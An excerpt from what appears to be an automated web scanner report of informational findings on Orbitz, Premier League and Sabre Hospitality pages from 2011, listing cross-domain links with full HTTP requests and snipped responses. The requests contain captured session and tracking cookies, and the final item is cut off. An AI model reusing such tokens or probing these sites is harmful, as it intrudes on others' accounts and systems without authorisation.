<li><a rel="nofollow" href="http://www.orbitzgames.com">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/">Orbitz for Agents</a>
...[SNIP]...
<li class="icon facebook">
                   <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook</a>
...[SNIP]...
<li class="icon twitter last">
                   <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter</a>
...[SNIP]...
</ul>

               
            <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png" alt="Orbitz" height="15" width="100" class="logo" />
    <div class="agencyInformation">
...[SNIP]...
<!-- [/standard Advert: 120x55_footer]    -->
<a href="https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&amp;dn=www.orbitz.com&amp;lang=en" class="link" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif" alt="logo" height="35" width="66" />
    </a> <a href="http://www.truste.org/ivalidate.php?url=www.orbitz.com&amp;sealid=101" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif" alt="TRUSTe" height="35" width="128" />
    </a>
...[SNIP]...
<noscript>
            <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />                
           </noscript>
...[SNIP]...

19.239. http://www.orbitz.com/shop/hotelsearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10417&hotel.hkey=10417_null_null_null_A1:0 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; adRotator=true; JSESSIONID=DFE4F06BE571072B; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|egapp2189p.prod.orbitz.net; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA1NTEzNDh8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOTowOToxMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b25545525d5f4f58455e445a4a4217b9; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; mbox=session#1317600406536-142286#1317602423|check#true#1317600623|PC#1317600406536-142286.19#1320192592; curr=USD; _br_uid_1=uid%3D999836241826%3A; _br_uid_2=uid%3D999836241826%3A%3A; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598015900:ss=1317596806325; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:41:11 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjQ4MjZ8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowNCBQTXwgfCA="; Version=1; Domain=orbitz.com; Max-Age=2592000; Expires=Wed, 02-Nov-2011 00:27:04 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:27:04 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:27:05 GMT
Content-Length: 184674


...[SNIP]...
<link rel="canonical" href="http://www.orbitz.com/hotel/United_States--MA/Boston/The_Boston_Park_Plaza_Hotel_&_Towers.h10417/"/>
<link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/ORB/cssAll1.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/ORB/cssAll2.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/style/global/printAll.css" media="print">
               <!--[if IE 6]>
...[SNIP]...
<!-- BEGIN LivePerson Monitor. -->
       <script type="text/javascript" src="http://www.tnetnoc.com/static/28.12.12/script/jsAllTealeaf.js"></script>
...[SNIP]...
<a href="http://www.orbitz.com/" class="link"> <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png" alt="Orbitz" height="28" width="153" class="logo" />
    </a>
...[SNIP]...
</h1>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    </div>
...[SNIP]...
<div class="photo">
                <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-1.jpg" alt="" />
</div>
...[SNIP]...
amp;pageView=virtualTour" class="virtualTourLink link" data-agent="{
       &#034;type&#034;:&#034;PopupWindow.VirtualTour&#034;
       
   }" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/photoviewer/virtualTour/photoviewer_virtualtour-1.png" alt="Virtual Tour" height="36" width="36" title="Virtual tour" />
    </a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-1.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-1.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Hotel-Exterior" />
</a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-4.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-4.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Hotel-Exterior" />
</a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-5.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-5.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Hotel-Exterior" />
</a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-6.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-6.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Hotel-Exterior" />
</a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Lobby-3.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Lobby-3.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Lobby" />
</a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Lobby-7.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Lobby-7.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Lobby" />
</a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Lobby-8.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Lobby-8.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Lobby" />
</a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Guest-Room-2.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Guest-Room-2.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Guest-Room" />
</a>
...[SNIP]...
</strong>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    </li>
...[SNIP]...
</strong>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    </li>
...[SNIP]...
<div class="lowAvailability">
    <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/itinerary/hotel/actfast/LSA_Arrow-1.png" alt="" height="15" width="15" />
    <span>
...[SNIP]...
<div class="lowAvailability">
    <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/itinerary/hotel/actfast/LSA_Arrow-1.png" alt="" height="15" width="15" />
    <span>
...[SNIP]...
<noscript>
                        <img src="http://maps.google.com/maps/api/staticmap?maptype=roadmap&size=530x300&markers=42.3513,-71.0704&zoom=14&language=en&sensor=false&client=gme-orbitz&signature=yWuJAdFz-8s5spAeim0yQT4yMB4=" alt="" />
</noscript>
...[SNIP]...
<p class="reviewApprovalOverview">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <span class="pctApproval">
...[SNIP]...
<span>Only show reviews by <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    Verified Customers</span>
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/notRecommended/large/ORB_ReviewsNotRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<h6>
                        <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/tip/medium/Tip_med-1.png" alt="" height="17" width="17" />
    Dining tip:
                       <span>
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/notRecommended/large/ORB_ReviewsNotRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-GB">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<div class="recommended">
            <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/hotel/reviews/recommended/large/ORB_ReviewsRecommended_lg-1.png" alt="" height="26" width="26" />
    <p>
...[SNIP]...
<div class="reviewerName">
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/verifiedCustomer/medium/VerifiedCustomer_med-1.png" alt="" height="19" width="21" title="Our Verified Customer label is only for guests who've booked this hotel with us" />
    <strong class="reviewer" lang="en-US">
...[SNIP]...
<h6>
                        <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/tip/medium/Tip_med-1.png" alt="" height="17" width="17" />
    Sightseeing tip:
                       <span>
...[SNIP]...
<div class="telesalesImages">
        <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/details/telesales/ORB_Telesales_HotelDetails-2.png" alt="Call us to book 1-866-672-4895" height="60" width="200" />
    </div>
...[SNIP]...
<div class="map staticMap">
                <img src="http://maps.google.com/maps/api/staticmap?maptype=roadmap&size=196x88&markers=42.3513,-71.0704&zoom=14&language=en&sensor=false&client=gme-orbitz&signature=BhOD5eVot_Og3njneU31pKtBBKI=" alt="" />
</div>
...[SNIP]...
<li><a rel="nofollow" href="http://www.orbitzgames.com">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/">Orbitz for Agents</a>
...[SNIP]...
<li class="icon facebook">
                   <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook</a>
...[SNIP]...
<li class="icon twitter last">
                   <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter</a>
...[SNIP]...
</ul>

               
            <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png" alt="Orbitz" height="15" width="100" class="logo" />
    <div class="agencyInformation">
...[SNIP]...
<!-- [/standard Advert: 120x55_footer]    -->
<a href="https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&amp;dn=www.orbitz.com&amp;lang=en" class="link" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif" alt="logo" height="35" width="66" />
    </a> <a href="http://www.truste.org/ivalidate.php?url=www.orbitz.com&amp;sealid=101" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif" alt="TRUSTe" height="35" width="128" />
    </a>
...[SNIP]...
<noscript>
            <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />                
           </noscript>
...[SNIP]...

19.240. http://www.premierleague.com/page/SearchResults/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /page/SearchResults/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date HTTP/1.1
Host: www.premierleague.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Players/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tabPreferences15685=0; tabPreferences4361=0; tabPreferences4381=0; tabPreferences4401=0; __utma=233090271.104762655.1317599330.1317599330.1317599330.1; __utmb=233090271.3.10.1317599330; __utmc=233090271; __utmz=233090271.1317599330.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tabPreferences5102=0; s_cc=true; rsi_segs=; s_sq=premiumtvpremierleague%3D%2526pid%253D/Players%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520document.getElementById%252528%252527categorySearchForm%252527%252529.submit%252528%252529%25257D%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Expires: Sun, 02 Oct 2011 23:53:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:53:13 GMT
Content-Length: 60029
Connection: close
Vary: Accept-Encoding


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Rendered: perslows03 at 03 10 2011 00:53:13 BST -->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ut
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<div><img src="http://a.analytics.yahoo.com/p.pl?a=1000441932162&js=no" width="1" height="1" alt="" /></div>
...[SNIP]...
<div class="layout barclaysAD">
<a href="http://www.barclays.co.uk" target="_blank"><img width="986" height="48" alt="Barclays" src="http://www.premierleague.com/javaImages/6e/a0/0,,12306~3317870,00.gif" />
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|327|2816968|0|1|ADTECH;loc=300;sub1=[subst];grp=[group]" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|327|2816968|0|1|ADTECH;loc=300;grp=[group]" border="0" width="468" height="60"></a>
...[SNIP]...
<li class="clubArsenal"><a href="http://www.arsenal.com" target="_blank"><img src="/javaImages/61/f3/0,,12306~3339105,00.gif" alt="Arsenal Football Club" title="Arsenal Football Club">
...[SNIP]...
<li><a href="http://www.avfc.co.uk" target="_blank"><img src="/javaImages/62/f3/0,,12306~3339106,00.gif" alt="Aston Villa Football Club" title="Aston Villa Football Club">
...[SNIP]...
<li><a href="http://www.rovers.co.uk" target="_blank"><img src="/javaImages/65/f3/0,,12306~3339109,00.gif" alt="Blackburn Rovers Football Club" title="Blackburn Rovers Football Club">
...[SNIP]...
<li><a href="http://www.bwfc.co.uk" target="_blank"><img src="/javaImages/67/f3/0,,12306~3339111,00.gif" alt="Bolton Wanderers Football Club" title="Bolton Wanderers Football Club">
...[SNIP]...
<li><a href="http://www.chelseafc.com" target="_blank"><img src="/javaImages/68/f3/0,,12306~3339112,00.gif" alt="Chelsea Football Club" title="Chelsea Football Club">
...[SNIP]...
<li><a href="http://www.evertonfc.com" target="_blank"><img src="/javaImages/6b/f3/0,,12306~3339115,00.gif" alt="Everton Football Club" title="Everton Football Club">
...[SNIP]...
<li><a href="http://www.fulhamfc.com" target="_blank"><img src="/javaImages/6c/f3/0,,12306~3339116,00.gif" alt="Fulham Football Club" title="Fulham Football Club">
...[SNIP]...
<li><a href="http://www.liverpoolfc.tv" target="_blank"><img src="/javaImages/6e/f3/0,,12306~3339118,00.gif" alt="Liverpool Football Club" title="Liverpool Football Club">
...[SNIP]...
<li><a href="http://www.mcfc.co.uk" target="_blank"><img src="/javaImages/70/f3/0,,12306~3339120,00.gif" alt="Manchester City Football Club" title="Manchester City Football Club">
...[SNIP]...
<li><a href="http://www.manutd.com" target="_blank"><img src="/javaImages/72/f3/0,,12306~3339122,00.gif" alt="Manchester United Football Club" title="Manchester United Football Club">
...[SNIP]...
<li><a href="http://www.nufc.co.uk" target="_blank"><img src="/javaImages/76/92/0,,12306~8819318,00.gif" alt="Newcastle United Football Club" title="Newcastle United Football Club">
...[SNIP]...
<li><a href="http://www.canaries.co.uk" target="_blank"><img src="/javaImages/c6/78/0,,12306~9730246,00.jpg" alt="Norwich City Football Club" title="Norwich City Football Club">
...[SNIP]...
<li><a href="http://www.qpr.co.uk" target="_blank"><img src="/javaImages/c7/78/0,,12306~9730247,00.jpg" alt="Queens Park Rangers Football Club" title="Queens Park Rangers Football Club">
...[SNIP]...
<li><a href="http://www.stokecityfc.com" target="_blank"><img src="/javaImages/c1/46/0,,12306~3688129,00.gif" alt="Stoke City Football Club" title="Stoke City Football Club">
...[SNIP]...
<li><a href="http://www.safc.com" target="_blank"><img src="/javaImages/78/f3/0,,12306~3339128,00.gif" alt="Sunderland AFC" title="Sunderland AFC">
...[SNIP]...
<li><a href="http://www.swanseacity.net" target="_blank"><img src="/javaImages/c8/78/0,,12306~9730248,00.jpg" alt="Swansea City Football Club" title="Swansea City Football Club">
...[SNIP]...
<li><a href="http://www.tottenhamhotspur.com" target="_blank"><img src="/javaImages/79/f3/0,,12306~3339129,00.gif" alt="Tottenham Hotspur Football Club" title="Tottenham Hotspur Football Club">
...[SNIP]...
<li class="clubWestBrom"><a href="http://www.wba.co.uk" target="_blank"><img src="/javaImages/77/92/0,,12306~8819319,00.gif" alt="West Bromwich Albion Football Club" title="West Bromwich Albion Football Club">
...[SNIP]...
<li class="clubWigan"><a href="http://www.wiganlatics.co.uk" target="_blank"><img src="/javaImages/7b/f3/0,,12306~3339131,00.gif" alt="Wigan Athletic Football Club" title="Wigan Athletic Football Club">
...[SNIP]...
<li>&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://www.wolves.co.uk" target="_blank"><img src="/javaImages/c6/9f/0,,12306~6004678,00.gif" alt="Wolverhampton Wanderers Football Club" title="Wolverhampton Wanderers Football Club">
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|327|2816969|0|170|ADTECH;loc=300;sub1=[subst];grp=[group]" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|327|2816969|0|170|ADTECH;loc=300;grp=[group]" border="0" width="300" height="250"></a>
...[SNIP]...
<div class="layout skyAds">
<a href="http://www.barclays.co.uk" target="_blank"><img width="120" height="29" alt="Barclays Premier League" src="http://www.premierleague.com/javaImages/8d/92/0,,12306~3314317,00.gif" />
...[SNIP]...
<noscript><a href="http://adserver.adtech.de/adlink|3.0|327|2816967|0|168|ADTECH;loc=300;sub1=[subst];grp=[group]" target="_blank"><img src="http://adserver.adtech.de/adserv|3.0|327|2816967|0|168|ADTECH;loc=300;grp=[group]" border="0" width="120" height="600"></a>
...[SNIP]...
<div class="PL_barc">
<a href="http://www.barclays.co.uk/" target="blank_">
<img src="/javaImages/c5/34/0,,12306~5518533,00.gif" alt="Barclays">
...[SNIP]...
<div align="center">
<img src="http://www.personal.barclays.co.uk/PFS/A/Content/Images/pleague-arrow-1.gif" alt="*" />
<a target="_blank" href="http://www.barclays.co.uk/Currentaccounts/P1242557963414" style="color: rgb(78, 188, 235); text-decoration: none">
<strong>
...[SNIP]...
</a>
<img src="http://www.personal.barclays.co.uk/PFS/A/Content/Images/pleague-arrow-1.gif" alt="*" />
<a target="_blank" href="http://www.barclays.co.uk/Savings/ISAs/H1242557860616?selectedGroupName=ISAs" style="color: rgb(78, 188, 235); text-decoration: none">
<strong>
...[SNIP]...
</a>
<img src="http://www.personal.barclays.co.uk/PFS/A/Content/Images/pleague-arrow-1.gif" alt="*" />
<a target="_blank" href="http://www.barclays.co.uk/Insurance/Homeinsurance/BuildingsandContentsInsurance/P1242557976121" style="color: rgb(78, 188, 235); text-decoration: none">
<strong>
...[SNIP]...
<div class="PL_col2_left">
<a href="http://www.easportsfootball.com" target="blank_">
<img src="/javaImages/87/81/0,,12306~8946055,00.gif" alt="EA SPORTS">
...[SNIP]...
<div class="PL_col2_middle">
<a href="http://www.nikefootball.com" target="blank_">
<img src="/javaImages/5f/9f/0,,12306~8822623,00.gif" alt="Nike">
...[SNIP]...
<div class="PL_col2_right">
<a href="http://www.footballpools.com" target="blank_">
<img src="/javaImages/79/1c/0,,12306~8985721,00.jpg" alt="Football Pools">
...[SNIP]...
<div class="PL_bottomMainAds">
<a href="http://www.likeaballs.com/" target="blank_">
<img src="/javaImages/82/f4/0,,12306~5043330,00.gif" alt="Likeaballs">
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=G07611"></script>
...[SNIP]...

19.241. http://www.sabrehospitality.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabrehospitality.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /?esiteurl=sabrehospitalitysolutions.com HTTP/1.1
Host: www.sabrehospitality.com
Proxy-Connection: keep-alive
